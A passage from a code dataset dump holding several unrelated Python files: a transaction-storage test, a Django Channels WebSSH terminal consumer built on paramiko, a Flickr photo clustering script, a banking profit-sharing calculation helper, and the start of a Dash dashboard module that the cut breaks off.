[threadutil.start_daemon(_apply, args=(ii, ))\n for ii in range(n_thread)]\n\n for th in ths:\n th.join()\n\n rec, ver = self.sto.record.get('bar')\n dd(len(rec))\n dd(ver)\n\n self.assertEqual(set(success_tx.keys()),\n set([x[0] for x in rec]))\n\n rec, ver = self.sto.record.get('bar')\n dd(rec, ver)\n\n self.assertLessEqual(ver, 1+n_thread*n_repeat)\n self.assertEqual(n_thread*n_repeat, rec[-1][0])\n self.assertEqual(n_thread*n_repeat, rec[-1][1])\n\n def _rand_txids(self):\n for ii in range(100):\n txid = int(ii % 53 * 1.3)\n yield txid\n\n def test_add_to_txidset(self):\n\n self.assertRaises(KeyError, self.sto.add_to_txidset, 'foo', 1)\n\n expected = {txid: True\n for txid in self._rand_txids()}\n\n for status in STATUS:\n for txid in self._rand_txids():\n self.sto.add_to_txidset(status, txid)\n\n dd(sorted(expected.keys()))\n\n rst, ver = self.sto.txidset.get()\n dd(rst[status])\n\n for txid in expected:\n self.assertTrue(rst[status].has(txid))\n\n for txid in range(100):\n if txid not in expected:\n self.assertFalse(rst[status].has(txid))\n\n def test_add_to_txidset_concurrent(self):\n\n expected = {txid: True\n for txid in self._rand_txids()}\n\n n_thread = 2\n status = COMMITTED\n\n def _add():\n for txid in self._rand_txids():\n self.sto.add_to_txidset(status, txid)\n\n for th in [threadutil.start_daemon(_add)\n for _ in range(n_thread)]:\n\n th.join()\n\n rst, ver = self.sto.txidset.get()\n dd(rst[status])\n\n for txid in expected:\n self.assertTrue(rst[status].has(txid))\n\n for txid in range(100):\n if txid not in expected:\n self.assertFalse(rst[status].has(txid))\n\n def 
test_purge(self):\n\n self.sto.max_journal_history = 5\n\n cases = (\n (\n {PURGED: [], COMMITTED: [[1, 100]]},\n {PURGED: [[1, 95]], COMMITTED: [[95, 100]]},\n ),\n # with unknown txid 10\n (\n {PURGED: [[1, 10]], COMMITTED: [[11, 20]]},\n {PURGED: [[1, 10], [11, 15]], COMMITTED: [[15, 20]]},\n ),\n # no need to purge\n (\n {PURGED: [[1, 10]], COMMITTED: [[11, 15]]},\n {PURGED: [[1, 10]], COMMITTED: [[11, 15]]},\n ),\n (\n {PURGED: [[1, 10]], COMMITTED: [[11, 14], [15, 18]]},\n {PURGED: [[1, 10], [11, 12]], COMMITTED: [[12, 14], [15, 18]]},\n ),\n )\n\n for inp, expected in cases:\n inp = {k: rangeset.RangeSet(v) for k, v in inp.items()}\n self.sto.purge(inp)\n self.assertEqual(expected, inp)\n","sub_path":"zktx/test/test_storage.py","file_name":"test_storage.py","file_ext":"py","file_size_in_byte":7328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"388605864","text":"# -*- coding:utf-8 -*-\r\nfrom channels.generic.websocket import WebsocketConsumer\r\nfrom django.utils.timezone import now\r\ntry:\r\n from django.utils.encoding import smart_unicode\r\nexcept ImportError:\r\n from django.utils.encoding import smart_text as smart_unicode\r\n\r\nimport time\r\nimport socket\r\nimport uuid\r\nimport traceback\r\nimport json\r\nimport paramiko\r\nimport io\r\n\r\nfrom terminal.models import SessionLog\r\nfrom .utils import get_redis_instance, SshTerminalThread, InterActiveShellThread, channel_layer\r\nfrom control.models import AgentAdmin\r\nfrom control.utils.esb_api import EsbApi\r\nfrom control.utils.encryption import PasswordEncryption\r\n\r\n\r\n# for webterminal \r\nclass WebSSH(WebsocketConsumer):\r\n ssh = paramiko.SSHClient()\r\n http_user = True\r\n channel_session = True\r\n channel_session_user = True\r\n first_flag = True\r\n\r\n def get_cookie(self):\r\n cookie = None\r\n for a in self.scope['headers']:\r\n if a[0] == b'cookie':\r\n cookie = a[1].decode()\r\n break\r\n if cookie:\r\n cookie = dict([x.split('=',1) for x in cookie.split('&')])\r\n return cookie\r\n\r\n def close_connect(self, text):\r\n self.send(text_data=text)\r\n self.close()\r\n return\r\n\r\n def connect(self, *args, **kwargs):\r\n self.wait_time = time.time()\r\n self.accept()\r\n # self.opt_username = self.get_user(self.scope)\r\n token = self.scope.get('cookies').get(\"bk_token\")\r\n bk_user = EsbApi(token).get_user_info() # fetch the current user\r\n self.opt_username = bk_user.get(\"username\")\r\n self.protocol = None\r\n self.server_id = self.scope['url_route']['kwargs'].get('server_id')\r\n query_string = self.scope['query_string'].decode()\r\n if query_string:\r\n query_dict = dict([x.split('=',1) for x in query_string.split('&')])\r\n width = int(float(query_dict[\"width\"]))\r\n height = int(float(query_dict[\"height\"]))\r\n password = None\r\n pri_key = None\r\n ssh_key_id = None\r\n session_uuid = None\r\n # if query_dict.get(\"ip\"):\r\n # self.hostname = query_dict[\"ip\"]\r\n # port = query_dict.get(\"port\")\r\n # self.username = query_dict.get(\"username\")\r\n # system_type = query_dict.get(\"system_type\")\r\n # session_uuid = query_dict.get(\"session_uuid\")\r\n # ssh_key_id = query_dict.get(\"ssh_key\")\r\n # password = query_dict.get(\"password\")\r\n if self.server_id:\r\n if AgentAdmin.objects.filter(id=self.server_id).count() == 0:\r\n self.close_connect(\"{'opsany_ssh_error':'Host does not exist!'}\")\r\n else:\r\n session_uuid = query_dict.get(\"session_uuid\")\r\n host_obj = AgentAdmin.objects.get(id=int(self.server_id))\r\n system_type = 
host_obj.system_type\r\n ssh_key_id = host_obj.ssh_key_id\r\n self.hostname = host_obj.ip\r\n port = host_obj.ssh_port\r\n self.username = host_obj.username\r\n password = PasswordEncryption().decrypt(host_obj.password) if host_obj.password and host_obj.ssh_type == \"password\" else \"\"\r\n else:\r\n self.close_connect(\"{'opsany_ssh_error':'Please add host information'}\")\r\n if system_type.strip() == \"Linux\":\r\n self.protocol = \"ssh\"\r\n else:\r\n self.close_connect(\"{'opsany_ssh_error':'system_type must be Linux!'}\")\r\n try:\r\n if ssh_key_id:\r\n cookies = self.scope[\"cookies\"]\r\n if not cookies or not cookies.get(\"bk_token\"):\r\n self.close_connect(\"{'opsany_ssh_error':'Cookie or bk_token not found!'}\")\r\n bk_token = cookies.get(\"bk_token\")\r\n esb_obj = EsbApi(bk_token)\r\n res = esb_obj.get_user_ssh_key(str(ssh_key_id))\r\n if not res:\r\n self.close_connect(\"{'opsany_ssh_error':'Unable to fetch ssh_key!'}\")\r\n pri_key_ = res.get('private_key')\r\n pri_key = io.StringIO(pri_key_)\r\n pri_key = paramiko.RSAKey.from_private_key(pri_key)\r\n if not (pri_key or password):\r\n self.close_connect(\"{'opsany_ssh_error':'Please provide a login password or key!'}\")\r\n if session_uuid:\r\n log_name = session_uuid\r\n else:\r\n log_name = str(uuid.uuid4())\r\n self.ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\r\n self.ssh.connect(\r\n self.hostname,\r\n port=port,\r\n username=self.username,\r\n password=password,\r\n pkey=pri_key,\r\n timeout=3\r\n )\r\n self.session_log = SessionLog.objects.create(user=self.opt_username, server=host_obj, channel=self.channel_name,\r\n log_name=log_name)\r\n except socket.timeout:\r\n self.close_connect(\"{'opsany_ssh_error':'Connection to server timed out!'}\")\r\n except Exception as e:\r\n self.close_connect(\"{'opsany_ssh_error':'SSH authentication failed!'}\")\r\n chan = self.ssh.invoke_shell(width=width, height=height, term='xterm')\r\n sshterminal = SshTerminalThread(self, chan, self.opt_username)\r\n sshterminal.daemon = True\r\n sshterminal.start()\r\n log_name = log_name + '.log'\r\n interactivessh = InterActiveShellThread(chan, self, log_name=log_name, width=width, height=height)\r\n interactivessh.daemon = True\r\n interactivessh.start()\r\n\r\n def disconnect(self, close_code):\r\n self.closessh()\r\n time.sleep(3)\r\n audit_log = SessionLog.objects.filter(channel=self.channel_name)\r\n if audit_log:\r\n audit_log.update(is_finished=True, end_time = now())\r\n self.close()\r\n\r\n @property\r\n def queue(self):\r\n queue = get_redis_instance()\r\n queue.pubsub()\r\n return queue\r\n\r\n def closessh(self):\r\n self.queue.publish(self.channel_name, json.dumps(['close']))\r\n\r\n def receive(self, text_data=None, bytes_data=None, **kwargs):\r\n try:\r\n if text_data is not None:\r\n data = json.loads(text_data)\r\n begin_time = time.time()\r\n if isinstance(data, list) and data[0] == 'username':\r\n self.username = data[1]\r\n elif isinstance(data, list) and data[0] == 'ip' and (len(data) == 5 or len(data) == 6):\r\n ip = data[1]\r\n width = data[2]\r\n height = data[3]\r\n session_uuid = data[4]\r\n self.hostname = ip\r\n try:\r\n self.ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\r\n server = AgentAdmin.objects.get(ip=ip)\r\n port = server.ssh_port\r\n if len(data) == 6:\r\n port = data[5]\r\n self.ssh.connect(ip, port=port, username=server.username, password=server.password, timeout=3)\r\n if len(session_uuid) == 36:\r\n log_name = session_uuid\r\n else:\r\n log_name = str(uuid.uuid4())\r\n SessionLog.objects.create(user=self.opt_username, server=server, channel=self.channel_name,\r\n 
log_name=log_name)\r\n except socket.timeout:\r\n self.send(text_data=\"Can not connect to server, timeout!\")\r\n self.disconnect(1000)\r\n return\r\n except Exception as e:\r\n self.send(text_data=\"Can not connect to server, Authentication failed.\")\r\n self.disconnect(1000)\r\n return\r\n ssh_chan = self.ssh.invoke_shell(width=width, height=height, term='xterm')\r\n sshterminal = SshTerminalThread(self, ssh_chan, self.opt_username)\r\n sshterminal.daemon = True\r\n sshterminal.start()\r\n log_name = log_name + '.log'\r\n interactivessh = InterActiveShellThread(ssh_chan, self, log_name=log_name, width=width, height=height)\r\n interactivessh.daemon = True\r\n interactivessh.start()\r\n elif isinstance(data, list) and data[0] in ['stdin', 'stdout']:\r\n self.queue.publish(self.channel_name, json.loads(text_data)[1])\r\n elif isinstance(data, list) and data[0] == u'set_size':\r\n self.queue.publish(self.channel_name, text_data)\r\n elif isinstance(data, list) and data[0] == u'close':\r\n self.disconnect(1000)\r\n return\r\n else:\r\n self.queue.publish(self.channel_name, text_data)\r\n elif bytes_data:\r\n self.queue.publish(self.channel_name, bytes_data)\r\n except socket.error:\r\n self.disconnect(1000)\r\n return\r\n except ValueError:\r\n if self.first_flag:\r\n self.first_flag = False\r\n self.queue.publish(self.channel_name, smart_unicode(text_data))\r\n except Exception as e:\r\n self.disconnect(1000)\r\n return\r\n","sub_path":"paas-ce/websocket/terminal/consumers.py","file_name":"consumers.py","file_ext":"py","file_size_in_byte":9844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"475034950","text":"import numpy as np\nimport csv, pprint\nimport json\nimport requests # http://docs.python-requests.org/en/master/user/quickstart/#make-a-request\n\nimport keys\n\nfrom sklearn.cluster import DBSCAN\nfrom sklearn import metrics\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.cluster import MeanShift, estimate_bandwidth\n\n#columns = ['id', 'user', 'latitude', 'longitude', 'hashtags', 'url']\n\nAPI_URL = 'https://maps.googleapis.com/maps/api/place/nearbysearch/json'\nPHOTO_URL = 'https://maps.googleapis.com/maps/api/place/photo?sensor={sensor}&key={key}&photoreference={photoreference}&maxheight={maxheight}&maxwidth={maxwidth}'\nDEFAULT_PARAMS = dict(sensor='false', key=keys.google_api_key)\n\ncsvfile = 'flickr_data.csv'\noutfile = 'output.csv'\ncluster_details = {}\ncluster_tags = {}\npp = pprint.PrettyPrinter()\n\nX = np.loadtxt(csvfile, delimiter=',', usecols=(2,3))\nbandwidth = estimate_bandwidth(X, quantile=0.0005, n_samples=10000)\n\n\t\t\t\t### \tCLUSTERING - MEANSHIFT \t\t###\n\nclustering = MeanShift(bandwidth=bandwidth, bin_seeding=True, cluster_all=False, min_bin_freq=10)\nclustering.fit(X)\nlabels = clustering.labels_\ncluster_centers = clustering.cluster_centers_\n\nfor label in labels: \n\ttry:\n\t\tif label in cluster_details:\n\t\t\tcontinue\n\t\telse: \n\t\t\tcluster_details[label] = cluster_centers[label] # Store cluster ID and centre point together\n\texcept IndexError:\n\t\tcontinue\npp.pprint(cluster_details)\n\n\t\t######################################################\n\n\t\t###\t\tADDING CLUSTER ID TO EACH PHOTO IN DATA FILE\t###\ni = 0\nwith open(csvfile, \"r\") as infile:\n\treader = csv.reader(infile)\n\n\twith open(outfile, \"w\", newline='') as outfile:\n\t\twriter = csv.writer(outfile)\n\t\t\n\t\tfor row in reader:\n\t\t\tcluster_id = 
labels[i]\n\t\t\trow.append(cluster_id)\n\t\t\twriter.writerow(row)\n\t\t\ti += 1\n\t\t\t\t#print(cluster_id)\n\n\toutfile.close()\ninfile.close()\n\n# Writing Clusters to file\n'''\nwith open(\"dublin_clusters.csv\", \"r+\") as csvfile:\n\twriter = csv.writer(csvfile)\n\twriter.writerow([cluster_centers, \"\\n\"])\n\ncsvfile.close()\n'''\n#print(cluster_centers)\n'''\nlabels_unique = np.unique(l for l in labels if l != -1)\nn_clusters_ = len(labels_unique)\n\ncluster_count = df[df['cluster'] != -1].groupby('cluster').size()\n'''\ndef popularTags(): # Find the tags that are most frequently used in each cluster\n\tcluster_count = 0\n\tclusters = {}\n\twith open('output.csv', 'r') as csvfile:\n\t\tcontent = csv.reader(csvfile)\n\t\tfor line in content:\n\t\t\tphoto = line[0]\n\t\t\tuser = line[1]\n\t\t\tlatitude = line[2]\n\t\t\tlongitude = line[3]\n\t\t\ttags = line[4]\n\t\t\turl = line[5]\n\t\t\tcluster = line[6]\t\n\n\t\t\tif cluster != '-1':\t\n\n\t\t\t\tif cluster in clusters:\n\t\t\t\t\tclusters[cluster] = clusters[cluster] + tags\n\t\t\t\telse:\n\t\t\t\t\tclusters[cluster] = {}\n\t\t\t\t\tcluster_count += 1\n\t\t\t\t\tclusters[cluster] = tags\n\tfor i in range(0, cluster_count):\n\t\twords \t\t\t= str(clusters[str(i)])\n\t\tclean_words \t= words.replace(\"b'\", \" \") # Clean the data\n\t\tcleaning_words\t= clean_words.replace(\"'\", \" \") # Clean the data\n\t\tcleaned_words\t= cleaning_words.replace(\"''\", \" \") # Clean the data\n\t\twords_split\t\t= cleaned_words.split()\n\t\tword_counter \t= {}\n\t\tfor word in words_split:\n\t\t if word in word_counter:\n\t\t word_counter[word] += 1\n\t\t else:\n\t\t word_counter[word] = 1\n\t\tpopular_words = sorted(word_counter, key = word_counter.get, reverse = True)\n\t\t#print(popular_words[:10])\n\t\tcluster_tags[str(i)] = popular_words[:10]\n\t\t#print(cluster_tags[str(i)])\n\ndef googleNearbyPlaces(lat, lng, rankby='distance', type='point_of_interest'):\n\n\tparams = dict(DEFAULT_PARAMS)\n\tparams['location'] \t= '{},{}'.format(lat, lng)\n\tparams['rankby'] \t= rankby\n\tparams['type'] \t\t= type\n\tresponse = requests.get(API_URL, params=params)\n\tdata \t= json.loads(response.text)['results']\n\tfor p_data in data:\n\t\tif not 'photos' in p_data:\n\t\t\tcontinue\n\t\tphoto_params = dict(DEFAULT_PARAMS)\n\t\tphoto_params.update(dict(photoreference=p_data['photos'][0]['photo_reference'], maxheight=400, maxwidth=700))\n\t\tp_data['main_photo'] = PHOTO_URL.format(**photo_params)\n\treturn data\n#for place in googleNearbyPlaces(53.34465732, -6.26666065):\n\t#pp.pprint(place['name'])\n\t#pp.pprint(place)\n#\tprint('-'*20)\n\npopularTags()\n#pp.pprint(cluster_tags)\n\ndef writeInfoToFile():\n\tfor cluster in cluster_details:\n\t\tif cluster != -1:\n\t\t\tprint(cluster)\n\t\t\tprint(cluster_details[cluster])\n\t\t\tprint(cluster_tags[str(cluster)])\n\t\t\tfor place in googleNearbyPlaces(cluster_details[cluster][0], cluster_details[cluster][1]):\n\t\t\t\tpp.pprint(place['name'].encode(\"utf-8\"))\n\t\telse:\n\t \t\tcontinue\nwriteInfoToFile()","sub_path":"ms_cluster.py","file_name":"ms_cluster.py","file_ext":"py","file_size_in_byte":4491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"89084544","text":"import com.ihsan.foundation.mobject as mobject\r\nimport com.ihsan.foundation.pobject as pobject\r\nimport string\r\nimport com.ihsan.lib.trace as trace\r\n\r\n#GLOBALS\r\nEPSILON = 0.00001\r\n#HEAD_TOTAL_M = ['220', '215', '225']\r\n\r\nclass HI1000_Helper(mobject.MObject):\r\n \r\n def 
mobject_init(self):\r\n self.account_helper = self.Helper.CreateObject('AccountHelper')\r\n \r\n period_helper = self.Helper.CreateObject('PeriodHelper')\r\n today = period_helper.GetCurrentDate()\r\n self.p_year = today.fl_accountingyear\r\n self.p_month = today.fl_accountingperiode\r\n \r\n # preparing vars...\r\n self._vars = {}\r\n self._varfuncs = {\r\n 'total_pdp' : self.__f_total_pdp, # compute total revenue in rupiah\r\n 'total_pdpv' : self.__f_total_pdpv, # compute total revenue in dollars\r\n 'total_m' : self.__f_total_m, # compute total third-party funds (DPK)\r\n 'total_mv' : self.__f_total_mv, # compute total third-party funds (DPK) in dollars\r\n 'total_r' : self.__f_total_r,\r\n 'total_v' : self.__f_total_v,\r\n 'invest_r' : self.__f_invest_r,\r\n 'invest_v' : self.__f_invest_v,\r\n 'total_pby_r': self.__f_total_pby_r,\r\n 'total_pby_v': self.__f_total_pby_v,\r\n 'total_sbu_r': self.__f_total_sbu_r,\r\n 'total_sbu_v': self.__f_total_sbu_v,\r\n 'a_tot_ppyr' : self.__f_a_total_ppyr,\r\n 'a_tot_ppyv' : self.__f_a_total_ppyv,\r\n 'koreksi_r' : self.__f_koreksi_r,\r\n 'koreksi_v' : self.__f_koreksi_v,\r\n 'total_aktr' : self.__f_total_aktr,\r\n 'total_pasr' : self.__f_total_pasr,\r\n 'total_aktd' : self.__f_total_aktd,\r\n 'total_pasd' : self.__f_total_pasd,\r\n 'total_ppyr' : self.__f_total_ppyr,\r\n 'total_ppyv' : self.__f_total_ppyv,\r\n 'total_psbr' : self.__f_total_psbr,\r\n 'total_psbv' : self.__f_total_psbv,\r\n 'ekiv_aktv' : self.__f_ekiv_aktv,\r\n 'ekiv_pasv' : self.__f_ekiv_pasv,\r\n 'ekiv_aktd' : self.__f_ekiv_aktd,\r\n 'ekiv_pasd' : self.__f_ekiv_pasd \r\n }\r\n \r\n def Hitung_HIPermil(self):\r\n permil_r = self.Helper.CreatePObject('HI_Permil', '000')\r\n permil_v = self.Helper.CreatePObject('HI_Permil', '411')\r\n \r\n #import rpdb2; rpdb2.start_embedded_debugger(\"01\", True, True)\r\n #trace.udp_trace(\"start hitung hi permil r\", \"192.168.1.8\")\r\n total_pdp = self.GetVar('total_pdp') \r\n total_m = self.GetVar('total_m')\r\n if total_m < EPSILON:\r\n permil_r_amt = 0.0\r\n else:\r\n permil_r_amt = total_pdp / (total_m * 1000)\r\n permil_r.amount = permil_r_amt\r\n total_pdpv = self.GetVar('total_pdpv') \r\n total_mv = self.GetVar('total_mv')\r\n if total_mv < EPSILON:\r\n permil_v_amt = 0.0\r\n else:\r\n permil_v_amt = total_pdpv / (total_mv * 1000)\r\n permil_v.amount = permil_v_amt \r\n \r\n def GetVar(self, var_name):\r\n if self._vars.has_key(var_name):\r\n return self._vars[var_name]\r\n else:\r\n val = self._varfuncs[var_name]() \r\n self._vars[var_name] = val\r\n \r\n return val \r\n \r\n def __f_total_pdp(self):\r\n total = self.GetVar('total_r')\r\n invest = self.GetVar('invest_r')\r\n a_tot_ppy = self.GetVar('a_tot_ppyr')\r\n koreksi = self.GetVar('koreksi_r')\r\n \r\n if total <= invest:\r\n if invest <= EPSILON:\r\n total_pdp = 0.0\r\n else:\r\n total_pdp = (total / invest) * (a_tot_ppy + koreksi)\r\n else:\r\n total_pdp = a_tot_ppy + koreksi\r\n\r\n return total_pdp\r\n \r\n def __f_total_pdpv(self):\r\n total = self.GetVar('total_v')\r\n invest = self.GetVar('invest_v')\r\n a_tot_ppy = self.GetVar('a_tot_ppyv')\r\n koreksi = self.GetVar('koreksi_v')\r\n \r\n if total <= invest:\r\n if invest <= EPSILON:\r\n total_pdp = 0.0\r\n else:\r\n total_pdp = (total / invest) * (a_tot_ppy + koreksi)\r\n else:\r\n total_pdp = a_tot_ppy + koreksi\r\n \r\n return total_pdp\r\n \r\n def __f_total_m(self):\r\n account_heads = self.Helper.GetObject('Parameter', 'DPK_HEAD'\r\n ).ParameterStringValue.split(',')\r\n total_m = 0\r\n for account_head in account_heads:\r\n total_m += 
self.account_helper.GetAvgBalance_Head(\r\n account_head,\r\n '000'\r\n )\r\n \r\n return total_m\r\n \r\n def __f_total_mv(self):\r\n account_heads = self.Helper.GetObject('Parameter', 'DPK_HEAD'\r\n ).ParameterStringValue.split(',')\r\n total_m = 0\r\n for account_head in account_heads:\r\n total_m += self.account_helper.GetAvgBalance_Head(\r\n account_head,\r\n '411'\r\n )\r\n \r\n return total_m\r\n \r\n def __f_total_r(self):\r\n total_m = self.GetVar('total_m')\r\n gwm = self.Helper.GetObject('Parameter', 'GWM_RUPIAH').ParameterValue\r\n total_r = total_m - (gwm/100 * total_m)\r\n \r\n return total_r\r\n \r\n def __f_total_v(self):\r\n total_m = self.GetVar('total_mv')\r\n gwm = self.Helper.GetObject('Parameter', 'GWM_VALAS').ParameterValue\r\n total_v = total_m - (gwm/100 * total_m)\r\n \r\n return total_v\r\n \r\n def __f_invest_r(self):\r\n invest = self.GetVar('total_pby_r') + self.GetVar('total_sbu_r')\r\n \r\n return invest\r\n \r\n def __f_invest_v(self):\r\n invest = self.GetVar('total_pby_v') + self.GetVar('total_sbu_v')\r\n \r\n return invest\r\n \r\n def __f_total_pby_r(self):\r\n return self.account_helper.GetAvgBalance_Intf('AVG_PBY', '000')\r\n \r\n def __f_total_pby_v(self):\r\n return self.account_helper.GetAvgBalance_Intf('AVG_PBY', '411')\r\n \r\n def __f_total_sbu_r(self):\r\n return self.account_helper.GetAvgBalance_Intf('AVG_SBPU', '000')\r\n \r\n def __f_total_sbu_v(self):\r\n return self.account_helper.GetAvgBalance_Intf('AVG_SBPU', '411')\r\n \r\n def __f_a_total_ppyr(self):\r\n total_aktr = self.GetVar('total_aktr')\r\n total_pasr = self.GetVar('total_pasr')\r\n total_aktd = self.GetVar('total_aktd')\r\n total_pasd = self.GetVar('total_pasd')\r\n \r\n total_ppy = self.GetVar('total_ppyr')\r\n total_psb = self.GetVar('total_psbr')\r\n \r\n if total_aktr > total_pasr:\r\n if total_aktd > total_pasd:\r\n a_total_ppy = total_ppy + total_psb\r\n else: # total_aktd <= total_pasd\r\n ekiv_aktv = self.GetVar('ekiv_aktv')\r\n ekiv_pasv = self.GetVar('ekiv_pasv')\r\n total_aktrv = total_aktr + ekiv_aktv\r\n \r\n total_ccf = (\r\n (total_aktr - total_pasr + ekiv_aktv - ekiv_pasv) / total_aktrv\r\n ) * (total_ppy + total_psb)\r\n \r\n a_total_ppy = total_ppy + total_psb - total_ccf\r\n else: # total_akt <= total_pas\r\n if total_aktd > total_pasd:\r\n ekiv_aktd = self.GetVar('ekiv_aktd')\r\n ekiv_pasd = self.GetVar('ekiv_pasd')\r\n \r\n total_pcf = (\r\n (ekiv_aktd - ekiv_pasd) / total_aktd\r\n ) * (total_ppy + total_psb)\r\n \r\n a_total_ppy = total_ppy + total_psb + total_pcf\r\n else: # total_aktd <= total_pasd\r\n a_total_ppy = total_ppy + total_psb\r\n \r\n return a_total_ppy\r\n \r\n def __f_a_total_ppyv(self):\r\n total_aktr = self.GetVar('total_aktr')\r\n total_pasr = self.GetVar('total_pasr')\r\n total_aktd = self.GetVar('total_aktd')\r\n total_pasd = self.GetVar('total_pasd')\r\n \r\n total_ppy = self.GetVar('total_ppyv')\r\n total_psb = self.GetVar('total_psbv')\r\n \r\n if total_aktr > total_pasr:\r\n if total_aktd > total_pasd:\r\n a_total_ppy = total_ppy + total_psb\r\n else: # total_aktd <= total_pasd\r\n ekiv_aktv = self.GetVar('ekiv_aktv')\r\n ekiv_pasv = self.GetVar('ekiv_pasv')\r\n total_aktrv = total_aktr + ekiv_aktv\r\n \r\n total_ccf = (\r\n (total_aktr - total_pasr + ekiv_aktv - ekiv_pasv) / total_aktrv\r\n ) * (total_ppy + total_psb)\r\n \r\n a_total_ppy = total_ppy + total_psb - total_ccf\r\n else: # total_akt <= total_pas\r\n if total_aktd > total_pasd:\r\n ekiv_aktd = self.GetVar('ekiv_aktd')\r\n ekiv_pasd = self.GetVar('ekiv_pasd')\r\n \r\n 
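# NOTE: interpretation assumed -- the correction below scales the pooled revenue\r\n # (total_ppy + total_psb) by the equivalent FX asset/liability gap relative to total FX assets.\r\n 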
total_pcf = (\r\n (ekiv_aktd - ekiv_pasd) / total_aktd\r\n ) * (total_ppy + total_psb)\r\n \r\n a_total_ppy = total_ppy + total_psb + total_pcf\r\n else: # total_aktd <= total_pasd\r\n a_total_ppy = total_ppy + total_psb\r\n \r\n return a_total_ppy\r\n \r\n def __f_koreksi_r(self):\r\n koreksi = self.Helper.GetObject('Parameter', 'HI_KOREKSI_RP').ParameterValue\r\n \r\n return koreksi\r\n \r\n def __f_koreksi_v(self):\r\n koreksi = self.Helper.GetObject('Parameter', 'HI_KOREKSI_VLS').ParameterValue\r\n \r\n return koreksi\r\n \r\n def __f_total_aktr(self):\r\n return self.account_helper.GetAvgBalance_Type('A', '000')\r\n \r\n def __f_total_aktd(self):\r\n return self.account_helper.GetAvgBalance_Type('A', '411')\r\n \r\n def __f_total_pasr(self):\r\n return ( \r\n self.account_helper.GetAvgBalance_Type('L', '000') +\r\n self.account_helper.GetAvgBalance_Type('E', '000') +\r\n self.account_helper.GetAvgBalance_Type('I', '000') -\r\n self.account_helper.GetAvgBalance_Type('X', '000')\r\n )\r\n \r\n def __f_total_pasd(self):\r\n return (\r\n self.account_helper.GetAvgBalance_Type('L', '411') +\r\n self.account_helper.GetAvgBalance_Type('E', '411') \r\n )\r\n \r\n def __f_total_ppyr(self):\r\n return self.account_helper.GetAvgBalance_Intf('REV_PBY_R', '000')\r\n \r\n def __f_total_ppyv(self):\r\n return self.account_helper.GetAvgBalance_Intf('REV_PBY_V', '411')\r\n \r\n def __f_total_psbr(self):\r\n return self.account_helper.GetAvgBalance_Intf('REV_SBPU_R', '000')\r\n \r\n def __f_total_psbv(self):\r\n return self.account_helper.GetAvgBalance_Intf('REV_SBPU_V', '411')\r\n\r\n def __f_ekiv_aktv(self):\r\n return self.account_helper.GetEkivAvgBalance_Type('A', ['000','411'], 1)\r\n\r\n def __f_ekiv_pasv(self):\r\n return (\r\n self.account_helper.GetEkivAvgBalance_Type('L', ['000','411'], 1) +\r\n self.account_helper.GetEkivAvgBalance_Type('E', ['000','411'], 1)\r\n )\r\n\r\n def __f_ekiv_aktd(self):\r\n return self.account_helper.GetEkivAvgBalance_Type('A', '411')\r\n\r\n def __f_ekiv_pasd(self):\r\n return (\r\n self.account_helper.GetEkivAvgBalance_Type('L', '411') +\r\n self.account_helper.GetEkivAvgBalance_Type('E', '411')\r\n )\r\n \r\nclass HI_Permil(pobject.PObject):\r\n # static variable\r\n pobject_classname = 'HI_Permil'\r\n pobject_keys = ['id_hipermil']\r\n \r\n def OnCreate(self, currency_code):\r\n self.period_helper = self.Helper.CreateObject('PeriodHelper')\r\n today = self.period_helper.GetCurrentDate()\r\n \r\n self.process_date = today.GetAsTDateTime('DateValue')\r\n self.p_year = today.fl_accountingyear\r\n self.p_month = today.fl_accountingperiode\r\n self.day_number = today.ln_accountingperiode.GetDayNumber()\r\n self.currency_code = currency_code\r\n \r\n \r\n","sub_path":"script_modules/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":12125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"281682219","text":"import dash_html_components as html\nfrom dash.dependencies import Input, Output, State\nfrom dash.exceptions import PreventUpdate\nimport plotly.express as px\nimport json\n\nfrom utils.load_df import siseri_quarter_df\nfrom utils.dosi_utils import get_aggreg_dosi\nfrom utils.anomaly_utils import get_iqr_enveloppes, get_dosi_envelop_df, get_number_atypical_measures, get_worker_number_atypical_measures\n\nfrom modules.sectors.layout import statistics_layout, enveloppes_layout\nfrom modules import cache\n\n\n@cache.memoize()\ndef get_domain_evol_graph(data_scope, aggreg_method, 
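\n    # NOTE: cache.memoize here (imported from modules; presumably a Flask-Caching cache object)\n    # keys results on the (data_scope, aggreg_method, domain_type) argument tuple, so repeated\n    # callbacks with the same controls reuse the already-built figure instead of re-aggregating.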
domain_type):\n\n plot_df = get_aggreg_dosi(\n siseri_quarter_df,\n context='sector',\n data_scope=data_scope,\n aggreg_method=aggreg_method,\n domain_type=domain_type\n )\n plot_df['measure_quarter_ts'] = plot_df['measure_quarter'].dt.to_timestamp()\n\n fig = px.scatter(plot_df,\n x='measure_quarter_ts',\n y='measure_value',\n color='sector_type')\n fig.update_traces(mode='lines+markers')\n fig.update_xaxes(title_text='Quarter', title_font=dict(size=16))\n fig.update_yaxes(title_text='Dosi [mSv]', title_font=dict(size=16))\n\n return fig\n\n\n@cache.memoize()\ndef get_domain_envelop_dfs(envelop_method, envelop_level, domain_type):\n envelop_df = get_iqr_enveloppes(\n siseri_quarter_df,\n context='sector',\n level=envelop_level,\n domain_type=domain_type\n )\n\n dosi_envelop_df = get_dosi_envelop_df(\n dosi_df=siseri_quarter_df,\n envelop_df=envelop_df,\n context='sector'\n )\n\n number_atypical_df = get_number_atypical_measures(\n dosi_envelop_df=dosi_envelop_df,\n context='sector'\n )\n\n worker_number_atypical_df = get_worker_number_atypical_measures(\n dosi_envelop_df=dosi_envelop_df,\n context='sector'\n )\n\n return envelop_df, number_atypical_df, worker_number_atypical_df\n\n\ndef get_envelop_graph(envelop_df):\n\n envelop_df['measure_quarter_ts'] = envelop_df['measure_quarter'].dt.to_timestamp()\n\n fig = px.scatter(envelop_df,\n x='measure_quarter_ts',\n y='upper_bound',\n color='sector_type')\n fig.update_traces(mode='lines+markers')\n fig.update_xaxes(title_text='Quarter', title_font=dict(size=16))\n fig.update_yaxes(title_text='Dosi [mSv]', title_font=dict(size=16))\n\n return fig\n\n\ndef 